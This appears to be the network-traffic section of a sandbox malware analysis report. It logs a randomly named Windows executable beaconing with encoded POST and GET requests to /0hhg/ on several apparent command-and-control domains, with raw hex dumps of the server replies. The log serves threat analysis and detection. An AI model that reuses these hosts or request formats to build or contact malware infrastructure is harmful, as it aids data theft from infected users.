                                                                                                    May 2, 2024 08:25:52.000978947 CEST1277INData Raw: 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66
                                                                                                    Data Ascii: (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-fram
                                                                                                    May 2, 2024 08:25:52.001024008 CEST1277INData Raw: 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 46 75 6c 6c 2d 54 72 61 63
                                                                                                    Data Ascii: `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions
                                                                                                    May 2, 2024 08:25:52.001090050 CEST1277INData Raw: 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61
                                                                                                    Data Ascii: lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" hr
                                                                                                    May 2, 2024 08:25:52.001140118 CEST1277INData Raw: 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65
                                                                                                    Data Ascii: a (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9
                                                                                                    May 2, 2024 08:25:52.106251955 CEST1277INData Raw: 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61 6d 65 5f 69 64 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61
                                                                                                    Data Ascii: changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (currentSource && el) { currentSource.className += " hidden";
                                                                                                    May 2, 2024 08:25:52.106270075 CEST1277INData Raw: 65 6c 70 65 72 3d 27 70 61 74 68 27 3e 0a 20 20 3c 74 64 20 64 61 74 61 2d 72 6f 75 74 65 2d 6e 61 6d 65 3d 27 72 6f 6f 74 27 3e 0a 20 20 20 20 20 20 72 6f 6f 74 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 65 6c 70 65 72 27 3e 5f 70 61 74 68 3c 2f
                                                                                                    Data Ascii: elper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-path='/'> / </td> <td> <p>main#index</p> </td></tr><tr class='route_row' data-helper='path'


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    14  192.168.2.4  49751  216.40.34.41  80  916  C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    May 2, 2024 08:25:54.663068056 CEST  740  OUT  POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.whirledairlines.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.whirledairlines.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:25:54.801769972 CEST  1277  IN  HTTP/1.1 404 Not Found
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-request-id: 6be9d13a-2dba-46bd-9c19-b35affe7f6c0
                                                                                                    x-runtime: 0.029447
                                                                                                    content-length: 18207
                                                                                                    connection: close


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    15  192.168.2.4  49752  216.40.34.41  80  916  C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    May 2, 2024 08:25:57.424808979 CEST  1289  OUT  POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.whirledairlines.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.whirledairlines.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:25:57.722740889 CEST  1277  IN  HTTP/1.1 404 Not Found
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-request-id: 7035b86c-7e22-43c3-90bb-e042de1a7097
                                                                                                    x-runtime: 0.025147
                                                                                                    content-length: 28287
                                                                                                    connection: close
                                                                                                    Data Ascii: a (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9
                                                                                                    May 2, 2024 08:25:57.828059912 CEST1277INData Raw: 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61 6d 65 5f 69 64 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61
                                                                                                    Data Ascii: changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (currentSource && el) { currentSource.className += " hidden";


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49753 | 216.40.34.41 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:26:00.253485918 CEST | 443 | OUT | GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1
Host: www.whirledairlines.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:26:00.366607904 CEST | 1277 | IN | HTTP/1.1 200 OK
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-download-options: noopen
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
content-type: text/html; charset=utf-8
etag: W/"9b1d5500ef559cdf1d67ac85005271a6"
cache-control: max-age=0, private, must-revalidate
x-request-id: 415a058f-0206-4914-a31a-3bb15fd5b3c6
x-runtime: 0.004613
transfer-encoding: chunked
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49754 | 203.161.50.127 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:26:05.731204987 CEST | 714 | OUT | POST /0hhg/ HTTP/1.1
Host: www.quantummquest.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.quantummquest.top
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 205
Referer: http://www.quantummquest.top/0hhg/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=qBEe7YwJmHI6ka05f/It9KG0hh+HZ4D4kOU68fK8IJ5BrrJ7GmTgapOdAdSjiVMJK9PWk58PjAlfSWwadGOPEa3jSd7/lUz7ys9k6+HtqVrT7n7NhjFareNTuqqB41i8k9tA9YqFYCH4KjuYQJ77mgwWWDaYGa6SIpAcKG8WGEYCz32xkqgQ7abkx7J+x9yO4g==
May 2, 2024 08:26:05.905002117 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Thu, 02 May 2024 06:26:05 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49755 | 203.161.50.127 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:26:08.857439041 CEST | 734 | OUT | POST /0hhg/ HTTP/1.1
Host: www.quantummquest.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.quantummquest.top
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 225
Referer: http://www.quantummquest.top/0hhg/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=qBEe7YwJmHI6k7E5YcgtqaG3kh+HCID8kPo68a7jIdVBlvF7FiPgT5OdL9ScmVMAK8zok74PjAxfSTUacxyMW63hLN79o0z7ys9k6+TDqUPT4UjNhCFZm+NS46qByViwk9ti9dK/YBv4Kh2YXY76vgwQYjbLXqT6SNYQFQ8mO38lyxnr1bBHpa/Xs8AK8+PHjsP/MLJQ559N0TyD01VqARo=
May 2, 2024 08:26:09.022974014 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Thu, 02 May 2024 06:26:08 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html
                                                                                                    May 2, 2024 08:26:09.023370981 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                                    Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                                    May 2, 2024 08:26:09.023736000 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                                    Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                                    May 2, 2024 08:26:09.023888111 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                                    Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                                    May 2, 2024 08:26:09.023937941 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                                    Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                                    May 2, 2024 08:26:09.024012089 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                    Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                                    May 2, 2024 08:26:09.024104118 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                                    Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                                    May 2, 2024 08:26:09.177483082 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                                    Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49756 | 203.161.50.127 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:26:11.555306911 CEST | 10816 | OUT | POST /0hhg/ HTTP/1.1
Host: www.quantummquest.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.quantummquest.top
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 10305
Referer: http://www.quantummquest.top/0hhg/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:26:11.729702950 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Thu, 02 May 2024 06:26:11 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49757 | 203.161.50.127 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:26:14.237984896 CEST | 441 | OUT | GET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1
Host: www.quantummquest.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:26:14.403147936 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Thu, 02 May 2024 06:26:14 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html; charset=utf-8


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    21 | 192.168.2.4 | 49758 | 119.18.54.116 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:20.710155964 CEST | 717 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.yamiyasheec.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.yamiyasheec.online/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=aPXOONKnr/6UsdES7SAthGYM5qQmS341gyIwrKor15K/2q8BAGR/CE5AF50IINC5nnMNwwAEX4A8qltmEMHC0Ye+dVcEo4yfwxQGR3l3pxwujeGqORiS6Ov+/s7jO31nuKdGPd0SwUe+TY7e/fijRi+OWZiNsML/AN7GuPfMAlKyDIKpL6mT0ovvYCYexrTEiA==
                                                                                                    May 2, 2024 08:26:21.114871979 CEST | 176 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:20 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    22 | 192.168.2.4 | 49759 | 119.18.54.116 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:24.024579048 CEST | 737 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.yamiyasheec.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.yamiyasheec.online/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=aPXOONKnr/6Ut8US910twmYP6qQmYX4xgyEwrO4B1Lu/2IkBR3R/BE5AOZ1DQtCEnnIFwwMEX4U8qnlmH87B3oerU1cC1oyfwxQGR0YspxoujuWqP12d2uv92M7jK31juKdgPYc4wXq+Tdfe/KWiES+MSZjs98X3NIK4lMnqPl6BPubzaLHEmoLcFFRq8ouN5BOuHDZwRNVedU0NSrzunY0=
                                                                                                    May 2, 2024 08:26:24.428209066 CEST | 176 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:24 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    23 | 192.168.2.4 | 49760 | 119.18.54.116 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:27.604631901 CEST | 10819 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.yamiyasheec.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.yamiyasheec.online/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8= [TRUNCATED]
                                                                                                    May 2, 2024 08:26:28.011447906 CEST | 176 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:27 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    24 | 192.168.2.4 | 49761 | 119.18.54.116 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:30.653178930 CEST | 442 | OUT | GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:31.056354046 CEST | 176 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:30 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    25 | 192.168.2.4 | 49762 | 188.116.38.155 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:36.839521885 CEST | 705 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.applesolve.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.applesolve.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=imtQaEN8dJz/gHSylUwPO2edYIRHsInOS5D0y8TcSkNSESEPR601l3EcRLLgta28zIqHGT6nu9hEe7MRY4lgWeicrLnTWHVHl+ED3/WQnIb/E+i1x0z5FUTZg8l4VfMECBHlmE/slRJQcCjizt8ATseDsABdbcvz4oQ8k5umNrKrmzy+nRm8mFuFSveoeA9+Ww==
                                                                                                    May 2, 2024 08:26:37.571536064 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
                                                                                                    transfer-encoding: chunked
                                                                                                    content-encoding: br
                                                                                                    vary: Accept-Encoding
                                                                                                    date: Thu, 02 May 2024 06:26:36 GMT
                                                                                                    server: LiteSpeed


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
